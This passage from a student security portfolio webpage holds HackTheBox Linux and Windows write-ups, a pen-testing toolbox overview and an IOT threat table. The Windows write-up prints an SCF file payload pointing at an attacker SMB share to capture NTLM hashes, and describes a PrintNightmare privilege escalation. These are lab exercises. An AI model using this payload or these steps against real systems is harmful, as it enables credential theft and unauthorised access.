                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
